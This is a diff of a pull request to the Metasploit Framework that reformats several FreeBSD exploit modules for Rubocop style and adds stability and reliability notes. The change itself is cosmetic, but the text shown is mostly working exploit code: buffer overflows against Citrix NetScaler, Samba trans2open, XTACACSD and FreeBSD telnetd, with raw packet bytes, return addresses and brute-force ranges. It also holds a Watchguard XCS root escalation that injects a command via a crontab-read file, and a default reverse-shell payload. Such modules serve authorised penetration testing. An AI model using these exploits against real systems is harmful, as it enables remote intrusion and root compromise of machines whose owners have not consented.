+          'stealth', # Discovery and exploit (4b1717926ed0d4823622011625fb1824)
+          'bcoles' # Metasploit (using Kingcope's exploit code [modified])
+        ],
         'DisclosureDate' => '2009-11-30',
         'Platform' => ['bsd'], # FreeBSD
-        'Arch' =>
-          [
-            ARCH_X86,
-            ARCH_X64,
-            ARCH_ARMLE,
-            ARCH_AARCH64,
-            ARCH_PPC,
-            ARCH_MIPSLE,
-            ARCH_MIPSBE
-          ],
+        'Arch' => [
+          ARCH_X86,
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
         'SessionTypes' => ['shell'],
-        'References' =>
-          [
-            ['BID', '37154'],
-            ['CVE', '2009-4146'],
-            ['CVE', '2009-4147'],
-            ['SOUNDTRACK', 'https://www.youtube.com/watch?v=dDnhthI27Fg'],
-            ['URL', 'https://seclists.org/fulldisclosure/2009/Nov/371'],
-            ['URL', 'https://c-skills.blogspot.com/2009/11/always-check-return-value.html'],
-            ['URL', 'https://lists.freebsd.org/pipermail/freebsd-announce/2009-December/001286.html'],
-            ['URL', 'https://xorl.wordpress.com/2009/12/01/freebsd-ld_preload-security-bypass/'],
-            ['URL', 'https://securitytracker.com/id/1023250']
-          ],
+        'References' => [
+          ['BID', '37154'],
+          ['CVE', '2009-4146'],
+          ['CVE', '2009-4147'],
+          ['SOUNDTRACK', 'https://www.youtube.com/watch?v=dDnhthI27Fg'],
+          ['URL', 'https://seclists.org/fulldisclosure/2009/Nov/371'],
+          ['URL', 'https://c-skills.blogspot.com/2009/11/always-check-return-value.html'],
+          ['URL', 'https://lists.freebsd.org/pipermail/freebsd-announce/2009-December/001286.html'],
+          ['URL', 'https://xorl.wordpress.com/2009/12/01/freebsd-ld_preload-security-bypass/'],
+          ['URL', 'https://securitytracker.com/id/1023250']
+        ],
         'Targets' => [['Automatic', {}]],
-        'DefaultOptions' =>
-          {
-            'PAYLOAD' => 'bsd/x86/shell_reverse_tcp',
-            'PrependSetresuid' => true,
-            'PrependSetresgid' => true,
-            'PrependFork' => true,
-            'WfsDelay' => 10
-          },
-        'DefaultTarget' => 0
+        'DefaultOptions' => {
+          'PAYLOAD' => 'bsd/x86/shell_reverse_tcp',
+          'PrependSetresuid' => true,
+          'PrependSetresgid' => true,
+          'PrependFork' => true,
+          'WfsDelay' => 10
+        },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
       )
     )
     register_options([

--- a/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb
+++ b/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb
@@ -14,33 +14,38 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Watchguard XCS FixCorruptMail Local Privilege Escalation',
-      'Description'    => %q{
-        This module exploits a vulnerability in the Watchguard XCS 'FixCorruptMail' script called
-        by root's crontab which can be exploited to run a command as root within 3 minutes.
-      },
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Watchguard XCS FixCorruptMail Local Privilege Escalation',
+        'Description' => %q{
+          This module exploits a vulnerability in the Watchguard XCS 'FixCorruptMail' script called
+          by root's crontab which can be exploited to run a command as root within 3 minutes.
+        },
+        'Author' => [
           'Daniel Jensen <daniel.jensen[at]security-assessment.com>' # discovery and Metasploit module
         ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
           ['URL', 'http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf']
         ],
-      'Platform'       => 'bsd',
-      'Arch'           => ARCH_X64,
-      'SessionTypes'   => ['shell'],
-      'Privileged'     => true,
-      'Targets'        =>
-        [
-          [ 'Watchguard XCS 9.2/10.0', { }]
+        'Platform' => 'bsd',
+        'Arch' => ARCH_X64,
+        'SessionTypes' => ['shell'],
+        'Privileged' => true,
+        'Targets' => [
+          [ 'Watchguard XCS 9.2/10.0', {}]
         ],
-      'DefaultOptions' => { 'WfsDelay' => 180 },
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2015-06-29'
-    ))
+        'DefaultOptions' => { 'WfsDelay' => 180 },
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2015-06-29',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK, ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
   end
 
   def setup
@@ -50,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    #Basic check to see if the device is a Watchguard XCS
+    # Basic check to see if the device is a Watchguard XCS
     res = cmd_exec('uname -a')
     return Exploit::CheckCode::Detected if res && res.include?('support-xcs@watchguard.com')
 
@@ -62,6 +67,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     write_file(fname, @pl)
     return nil unless file_exist?(fname)
+
     cmd_exec("chmod +x #{fname}")
 
     fname
@@ -70,24 +76,24 @@ class MetasploitModule < Msf::Exploit::Local
   def exploit
     print_warning('Rooting can take up to 3 minutes.')
 
-    #Generate and upload the payload
+    # Generate and upload the payload
     filename = upload_payload
     fail_with(Failure::NotFound, 'Payload failed to upload') if filename.nil?
     print_status("Payload #{filename} uploaded.")
 
-    #Sets up empty dummy file needed for privesc
+    # Sets up empty dummy file needed for privesc
     dummy_filename = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
     cmd_exec("touch #{dummy_filename}")
     vprint_status('Added dummy file')
 
-    #Put the shell injection line into badqids
-    #setup_privesc = "echo \"../../../../../..#{dummy_filename};#{filename}\" > /var/tmp/badqids"
+    # Put the shell injection line into badqids
+    # setup_privesc = "echo \"../../../../../..#{dummy_filename};#{filename}\" > /var/tmp/badqids"
     badqids = write_file('/var/tmp/badqids', "../../../../../..#{dummy_filename};#{filename}")
     fail_with(Failure::NotFound, 'Failed to create badqids file to exploit crontab') if badqids.nil?
     print_status('Badqids created, waiting for vulnerable script to be called by crontab...')
-    #cmd_exec(setup_privesc)
+    # cmd_exec(setup_privesc)
 
-    #Cleanup the files we used
+    # Cleanup the files we used
     register_file_for_cleanup('/var/tmp/badqids')
     register_file_for_cleanup(dummy_filename)
     register_file_for_cleanup(filename)

--- a/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb
+++ b/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb
@@ -10,72 +10,78 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::TcpServer
   include Msf::Exploit::Brute
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "Citrix NetScaler SOAP Handler Remote Code Execution",
-      'Description'    => %q{
-        This module exploits a memory corruption vulnerability on the Citrix NetScaler Appliance.
-        The vulnerability exists in the SOAP handler, accessible through the web interface. A
-        malicious SOAP requests can force the handler to connect to a malicious NetScaler config
-        server. This malicious config server can send a specially crafted response in order to
-        trigger a memory corruption and overwrite data in the stack, to finally execute arbitrary
-        code with the privileges of the web server running the SOAP handler. This module has been
-        tested successfully on the NetScaler Virtual Appliance 450010.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Citrix NetScaler SOAP Handler Remote Code Execution',
+        'Description' => %q{
+          This module exploits a memory corruption vulnerability on the Citrix NetScaler Appliance.
+          The vulnerability exists in the SOAP handler, accessible through the web interface. A
+          malicious SOAP requests can force the handler to connect to a malicious NetScaler config
+          server. This malicious config server can send a specially crafted response in order to
+          trigger a memory corruption and overwrite data in the stack, to finally execute arbitrary
+          code with the privileges of the web server running the SOAP handler. This module has been
+          tested successfully on the NetScaler Virtual Appliance 450010.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Bradley Austin', # Vulnerability Discovery and PoC
           'juan vazquez' # Metasploit module
         ],
-      'References'     =>
-        [
+        'References' => [
           ['URL', 'http://console-cowboys.blogspot.com/2014/09/scaling-netscaler.html']
         ],
-      'Payload'        =>
-        {
-          'Space'          => 1024,
-          'MinNops'        => 512,
+        'Payload' => {
+          'Space' => 1024,
+          'MinNops' => 512,
           'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
         },
-      'Arch'           => ARCH_X86,
-      'Platform'       => 'bsd',
-      'Stance'         => Msf::Exploit::Stance::Aggressive,
-      'Targets'        =>
-        [
-          [ 'NetScaler Virtual Appliance 450010',
+        'Arch' => ARCH_X86,
+        'Platform' => 'bsd',
+        'Stance' => Msf::Exploit::Stance::Aggressive,
+        'Targets' => [
+          [
+            'NetScaler Virtual Appliance 450010',
             {
-              'RwPtr'        => 0x80b9000, # apache2 rw address / Since this target is a virtual appliance, has sense.
-              'Offset'       => 606,
-              'Ret'          => 0xffffda94, # Try before bruteforce...
+              'RwPtr' => 0x80b9000, # apache2 rw address / Since this target is a virtual appliance, has sense.
+              'Offset' => 606,
+              'Ret' => 0xffffda94, # Try before bruteforce...
               # The virtual appliance lacks of security mitigations like DEP/ASLR, since the
               # process being exploited is an apache child, the bruteforce attack works fine
               # here.
-              'Bruteforce'   =>
+              'Bruteforce' =>
                 {
                   'Start' => { 'Ret' => 0xffffec00 }, # bottom of the stack
-                  'Stop'  => { 'Ret' => 0xfffdf000 }, # top of the stack
-                  'Step'  => 256
+                  'Stop' => { 'Ret' => 0xfffdf000 }, # top of the stack
+                  'Step' => 256
                 }
             }
           ],
         ],
-      'DisclosureDate' => '2014-09-22',
-      'DefaultTarget'  => 0))
+        'DisclosureDate' => '2014-09-22',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'Reliability' => [ REPEATABLE_SESSION, ],
+          'SideEffects' => [ IOC_IN_LOGS, ]
+        }
+      )
+    )
 
     register_options(
       [
         OptString.new('TARGETURI', [true, 'The base path to the soap handler', '/soap']),
-        OptAddress.new('SRVHOST', [true, "The local host to listen on. This must be an address on the local machine reachable by the target", ]),
-        OptPort.new('SRVPORT', [true,  "The local port to listen on.", 3010])
-      ])
+        OptAddress.new('SRVHOST', [true, 'The local host to listen on. This must be an address on the local machine reachable by the target', ]),
+        OptPort.new('SRVPORT', [true, 'The local port to listen on.', 3010])
+      ]
+    )
   end
-
 
   def check
     res = send_request_cgi({
       'method' => 'GET',
-      'uri'    => normalize_uri(target_uri.path)
+      'uri' => normalize_uri(target_uri.path)
     })
 
     if res && res.code == 200 && res.body && res.body =~ /Server Request Handler.*No body received/m
@@ -115,50 +121,50 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def send_request_soap
-    soap = <<-EOS
-<?xml version="1.0" encoding="ISO-8859-1"?><SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">
-<SOAP-ENV:Body>
-<ns7744:login xmlns:ns7744="urn:NSConfig">
-<username xsi:type="xsd:string">nsroot</username>
-<password xsi:type="xsd:string">nsroot</password>
-<clientip xsi:type="xsd:string">#{datastore['SRVHOST']}</clientip>
-<cookieTimeout xsi:type="xsd:int">1800</cookieTimeout>
-<ns xsi:type="xsd:string">#{datastore['SRVHOST']}</ns>
-</ns7744:login>
-</SOAP-ENV:Body>
-</SOAP-ENV:Envelope>
+    soap = <<~EOS
+      <?xml version="1.0" encoding="ISO-8859-1"?><SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">
+      <SOAP-ENV:Body>
+      <ns7744:login xmlns:ns7744="urn:NSConfig">
+      <username xsi:type="xsd:string">nsroot</username>
+      <password xsi:type="xsd:string">nsroot</password>
+      <clientip xsi:type="xsd:string">#{datastore['SRVHOST']}</clientip>
+      <cookieTimeout xsi:type="xsd:int">1800</cookieTimeout>
+      <ns xsi:type="xsd:string">#{datastore['SRVHOST']}</ns>
+      </ns7744:login>
+      </SOAP-ENV:Body>
+      </SOAP-ENV:Envelope>
     EOS
 
-    print_status("Sending soap request...")
+    print_status('Sending soap request...')
 
     send_request_cgi({
       'method' => 'POST',
-      'uri'    => normalize_uri(target_uri.path),
-      'data'   => soap
+      'uri' => normalize_uri(target_uri.path),
+      'data' => soap
     }, 1)
   end
 
-  def on_client_data(c)
-    print_status("#{c.peerhost} - Getting request...")
+  def on_client_data(cli)
+    print_status("#{cli.peerhost} - Getting request...")
 
-    data = c.get_once(2)
-    req_length = data.unpack("v")[0]
+    data = cli.get_once(2)
+    req_length = data.unpack('v')[0]
 
-    req_data = c.get_once(req_length - 2)
-    unless req_data.unpack("V")[0] == 0xa5a50000
-      print_error("#{c.peerhost} - Incorrect request... sending payload anyway")
+    req_data = cli.get_once(req_length - 2)
+    unless req_data.unpack('V')[0] == 0xa5a50000
+      print_error("#{cli.peerhost} - Incorrect request... sending payload anyway")
     end
 
-    print_status("#{c.peerhost} - Sending #{payload.encoded.length} bytes payload with ret 0x#{@curr_ret.to_s(16)}...")
+    print_status("#{cli.peerhost} - Sending #{payload.encoded.length} bytes payload with ret 0x#{@curr_ret.to_s(16)}...")
 
     my_payload = Rex::Text.pattern_create(target['Offset'])
-    my_payload << [@curr_ret, target['RwPtr']].pack("V*")
+    my_payload << [@curr_ret, target['RwPtr']].pack('V*')
     my_payload << payload.encoded
 
-    pkt = [my_payload.length + 6].pack("v")
+    pkt = [my_payload.length + 6].pack('v')
     pkt << "\x00\x00\xa5\xa5"
     pkt << my_payload
-    c.put(pkt)
-    c.disconnect
+    cli.put(pkt)
+    cli.disconnect
   end
 end

--- a/modules/exploits/freebsd/samba/trans2open.rb
+++ b/modules/exploits/freebsd/samba/trans2open.rb
@@ -10,66 +10,73 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Brute
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Samba trans2open Overflow (*BSD x86)',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Samba trans2open Overflow (*BSD x86)',
+        'Description' => %q{
           This exploits the buffer overflow found in Samba versions
-        2.2.0 to 2.2.8. This particular module is capable of
-        exploiting the flaw on x86 Linux systems that do not
-        have the noexec stack option set.
-      },
-      'Author'         => [ 'hdm', 'jduck' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+          2.2.0 to 2.2.8. This particular module is capable of
+          exploiting the flaw on x86 Linux systems that do not
+          have the noexec stack option set.
+        },
+        'Author' => [ 'hdm', 'jduck' ],
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'CVE', '2003-0201' ],
           [ 'OSVDB', '4469' ],
           [ 'BID', '7294' ],
           [ 'URL', 'https://seclists.org/bugtraq/2003/Apr/103' ]
         ],
-      'Privileged'     => true,
-      'Payload'        =>
-        {
-          'Space'    => 1024,
+        'Privileged' => true,
+        'Payload' => {
+          'Space' => 1024,
           'BadChars' => "\x00",
-          'MinNops'  => 512,
+          'MinNops' => 512,
           'StackAdjustment' => -3500
         },
-      'Platform'       => 'bsd',
-      'Targets'        =>
-        [
+        'Platform' => 'bsd',
+        'Arch' => [ ARCH_X86 ],
+        'Targets' => [
           # tested OK - jjd:
           # FreeBSD 5.0-RELEASE samba-2.2.7a.tbz md5:cc477378829309d9560b136ca11a89f8
-          [ 'Samba 2.2.x - Bruteforce',
+          [
+            'Samba 2.2.x - Bruteforce',
             {
               'PtrToNonZero' => 0xbfbffff4, # near the bottom of the stack
-              'Offset'       => 1055,
-              'Bruteforce'   =>
+              'Offset' => 1055,
+              'Bruteforce' =>
                 {
                   'Start' => { 'Ret' => 0xbfbffdfc },
-                  'Stop'  => { 'Ret' => 0xbfa00000 },
-                  'Step'  => 256
+                  'Stop' => { 'Ret' => 0xbfa00000 },
+                  'Step' => 256
                 }
             }
           ],
         ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2003-04-07'
-      ))
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2003-04-07',
+        'Notes' => {
+          'Stability' => [ CRASH_SERVICE_RESTARTS, ],
+          'Reliability' => [ REPEATABLE_SESSION, ],
+          'SideEffects' => [ IOC_IN_LOGS, ]
+        }
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(139)
-      ])
+      ]
+    )
 
     deregister_options('SMB::ProtocolVersion')
   end
 
   def brute_exploit(addrs)
-
     curr_ret = addrs['Ret']
     begin
-      print_status("Trying return address 0x%.8x..." %  curr_ret)
+      print_status('Trying return address 0x%.8x...' % curr_ret)
 
       connect(versions: [1])
       smb_login
@@ -107,28 +114,26 @@ class MetasploitModule < Msf::Exploit::Remote
       pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack('V')
 
       # This stream covers the framepointer and the return address
-      #pattern[1199, 400] = [curr_ret].pack('N') * 100
+      # pattern[1199, 400] = [curr_ret].pack('N') * 100
       pattern[eip_off, 4] = [curr_ret].pack('V')
 
-      trans =
-        "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
-        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
-        "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
-        "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
-        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
-        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
-        pattern
+      trans = "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"
+      trans << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
+      trans << "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"
+      trans << "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"
+      trans << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+      trans << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"
+      trans << pattern
 
       # puts "press any key"; $stdin.gets
 
       sock.put(trans)
       handler
       disconnect
-
-    rescue EOFError
-    rescue => e
+    rescue EOFError => e
+      print_error(e.to_s)
+    rescue StandardError => e
       print_error(e.to_s)
     end
-
   end
 end

--- a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb
+++ b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb
@@ -10,45 +10,53 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Brute
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'XTACACSD report() Buffer Overflow',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'XTACACSD report() Buffer Overflow',
+        'Description' => %q{
           This module exploits a stack buffer overflow in XTACACSD <= 4.1.2. By
-        sending a specially crafted XTACACS packet with an overly long
-        username, an attacker may be able to execute arbitrary code.
-      },
-      'Author'         => 'MC',
-      'References'     =>
-        [
+          sending a specially crafted XTACACS packet with an overly long
+          username, an attacker may be able to execute arbitrary code.
+        },
+        'Author' => 'MC',
+        'References' => [
           ['CVE', '2008-7232'],
           ['OSVDB', '58140'],
           ['URL', 'http://aluigi.altervista.org/adv/xtacacsdz-adv.txt'],
         ],
-      'Payload'        =>
-        {
-          'Space'    => 175,
+        'Payload' => {
+          'Space' => 175,
           'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20",
           'StackAdjustment' => -3500,
           'PrependEncoder' => "\x83\xec\x7f",
-          'DisableNops'   =>  'True',
+          'DisableNops' => 'True'
         },
-      'Platform'       => 'bsd',
-      'Arch'           => ARCH_X86,
-      'Targets'        =>
-        [
-          ['FreeBSD 6.2-Release Bruteforce',
-            {'Bruteforce' =>
-              {
-                'Start' => { 'Ret' => 0xbfbfea00 },
-                'Stop'  => { 'Ret' => 0xbfbfef00 },
-                'Step'  => 24,
-              }
+        'Platform' => 'bsd',
+        'Arch' => ARCH_X86,
+        'Targets' => [
+          [
+            'FreeBSD 6.2-Release Bruteforce',
+            {
+              'Bruteforce' =>
+                  {
+                    'Start' => { 'Ret' => 0xbfbfea00 },
+                    'Stop' => { 'Ret' => 0xbfbfef00 },
+                    'Step' => 24
+                  }
             },
           ],
         ],
-      'Privileged'     => true,
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2008-01-08'))
+        'Privileged' => true,
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2008-01-08',
+        'Notes' => {
+          'Stability' => [ CRASH_SERVICE_RESTARTS, ],
+          'Reliability' => [ REPEATABLE_SESSION, ],
+          'SideEffects' => [ IOC_IN_LOGS, ]
+        }
+      )
+    )
 
     register_options([Opt::RPORT(49)])
   end
@@ -56,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def brute_exploit(address)
     connect_udp
 
-    sploit =  "\x80" # Version
+    sploit = "\x80" # Version
     sploit << "\x05" # Type: Connect
     sploit << "\xff\xff" # Nonce
     sploit << "\xff" # Username length
@@ -72,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
     sploit << make_nops(238 - payload.encoded.length)
     sploit << payload.encoded + [address['Ret']].pack('V')
 
-    print_status("Trying target #{target.name} #{"%.8x" % address['Ret']}...")
+    print_status("Trying target #{target.name} #{'%.8x' % address['Ret']}...")
     udp_sock.put(sploit)
 
     disconnect_udp

--- a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb
+++ b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb
@@ -12,68 +12,79 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::BruteTargets
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'FreeBSD Telnet Service Encryption Key ID Buffer Overflow',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'FreeBSD Telnet Service Encryption Key ID Buffer Overflow',
+        'Description' => %q{
           This module exploits a buffer overflow in the encryption option handler of the
-        FreeBSD telnet service.
+          FreeBSD telnet service.
         },
-      'Author'         => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        'Author' => [
+          'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>',
+          'Brandon Perry <bperry.volatile[at]gmail.com>',
+          'Dan Rosenberg',
+          'hdm'
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
           ['CVE', '2011-4862'],
           ['OSVDB', '78020'],
           ['BID', '51182'],
           ['EDB', '18280']
         ],
-      'Privileged'     => true,
-      'Platform'       => 'bsd',
-      'Payload'        =>
-        {
-          'Space'       => 128,
-          'BadChars'    => "\x00",
+        'Privileged' => true,
+        'Platform' => 'bsd',
+        'Arch' => [ ARCH_X86 ],
+        'Payload' => {
+          'Space' => 128,
+          'BadChars' => "\x00"
         },
 
-      'Targets'        =>
-        [
-          [ 'Automatic',  { } ],
-          [ 'FreeBSD 8.2',         { 'Ret' => 0x0804a8a9 } ], # call edx
-          [ 'FreeBSD 8.1',         { 'Ret' => 0x0804a889 } ], # call edx
-          [ 'FreeBSD 8.0',         { 'Ret' => 0x0804a869 } ], # call edx
-          [ 'FreeBSD 7.3/7.4',     { 'Ret' => 0x08057bd0 } ], # call edx
+        'Targets' => [
+          [ 'Automatic', {} ],
+          [ 'FreeBSD 8.2', { 'Ret' => 0x0804a8a9 } ], # call edx
+          [ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx
+          [ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx
+          [ 'FreeBSD 7.3/7.4', { 'Ret' => 0x08057bd0 } ], # call edx
           [ 'FreeBSD 7.0/7.1/7.2', { 'Ret' => 0x0804c4e0 } ], # call edx
-          [ 'FreeBSD 6.3/6.4',     { 'Ret' => 0x0804a5b4 } ], # call edx
+          [ 'FreeBSD 6.3/6.4', { 'Ret' => 0x0804a5b4 } ], # call edx
           [ 'FreeBSD 6.0/6.1/6.2', { 'Ret' => 0x08052925 } ], # call edx
-          [ 'FreeBSD 5.5',         { 'Ret' => 0x0804cf31 } ], # call edx
+          [ 'FreeBSD 5.5', { 'Ret' => 0x0804cf31 } ], # call edx
           # [ 'FreeBSD 5.4',         { 'Ret' => 0x08050006 } ] # Version 5.4 does not seem to be exploitable (the crypto() function is not called)
-          [ 'FreeBSD 5.3',         { 'Ret' => 0x8059730 } ], # direct return
+          [ 'FreeBSD 5.3', { 'Ret' => 0x8059730 } ], # direct return
           # Versions 5.2 and below do not support encyption
         ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2011-12-23'))
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2011-12-23',
+        'Notes' => {
+          'Stability' => [ CRASH_SERVICE_RESTARTS, ],
+          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
   end
 
-  def exploit_target(t)
-
+  def exploit_target(target)
     connect
     banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)
     vprint_status(banner_sanitized)
 
-    enc_init      = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0"
-    enc_keyid     = "\xff\xfa\x26\x07"
+    enc_init = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0"
+    enc_keyid = "\xff\xfa\x26\x07"
     end_suboption = "\xff\xf0"
 
     # Telnet protocol requires 0xff to be escaped with another
     penc = payload.encoded.gsub("\xff", "\xff\xff")
 
     key_id = Rex::Text.rand_text_alphanumeric(400)
-    key_id[ 0, 2] = "\xeb\x76"
-    key_id[72, 4] = [ t['Ret'] - 20 ].pack("V")
-    key_id[76, 4] = [ t['Ret'] ].pack("V")
+    key_id[0, 2] = "\xeb\x76"
+    key_id[72, 4] = [ target['Ret'] - 20 ].pack('V')
+    key_id[76, 4] = [ target['Ret'] ].pack('V')
 
     # Some of these bytes can get mangled, jump over them
-    key_id[80,112]  = Rex::Text.rand_text_alphanumeric(112)
+    key_id[80, 112] = Rex::Text.rand_text_alphanumeric(112)
 
     # Bounce to the real payload (avoid corruption)
     key_id[120, 2] = "\xeb\x46"
@@ -89,21 +100,25 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Wait for a successful response
     loop do
-      data = sock.get_once(-1, 5) rescue nil
-      if not data
-        fail_with(Failure::Unknown, "This system does not support encryption")
+      data = begin
+        sock.get_once(-1, 5)
+      rescue StandardError
+        nil
+      end
+      if !data
+        fail_with(Failure::Unknown, 'This system does not support encryption')
       end
       break if data.index("\xff\xfa\x26\x02\x01")
     end
 
     # The first request smashes the pointer
-    print_status("Sending first payload")
+    print_status('Sending first payload')
     sock.put(sploit)
 
     # Make sure the server replied to the first request
     data = sock.get_once(-1, 5)
     unless data
-      print_status("Server did not respond to first payload")
+      print_status('Server did not respond to first payload')
       return
     end
 
@@ -111,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
     ::IO.select(nil, nil, nil, 0.5)
 
     # The second request results in the pointer being called
-    print_status("Sending second payload...")
+    print_status('Sending second payload...')
     sock.put(sploit)
 
     handler


### PR DESCRIPTION
The majority of the Rubocop changes were auto applied (except for `Notes`). Several small manual code changes were required.

As for notes, I've tested several of these modules; and in all other instances the notes are written based on some Googling and the following heuristics:

* All modules are presumed to have `Reliability` of `REPEATABLE_SESSION` unless the module description or other sources suggest otherwise
* Modules which use `brute_exploit` are presumed to have `Stability` of `CRASH_SAFE` or `CRASH_SERVICE_RESTARTS` (network services provided by `inetd` should auto-restart)
* All modules which `register_file_for_cleanup` list `ARTIFACTS_ON_DISK` for `SideEffects`.


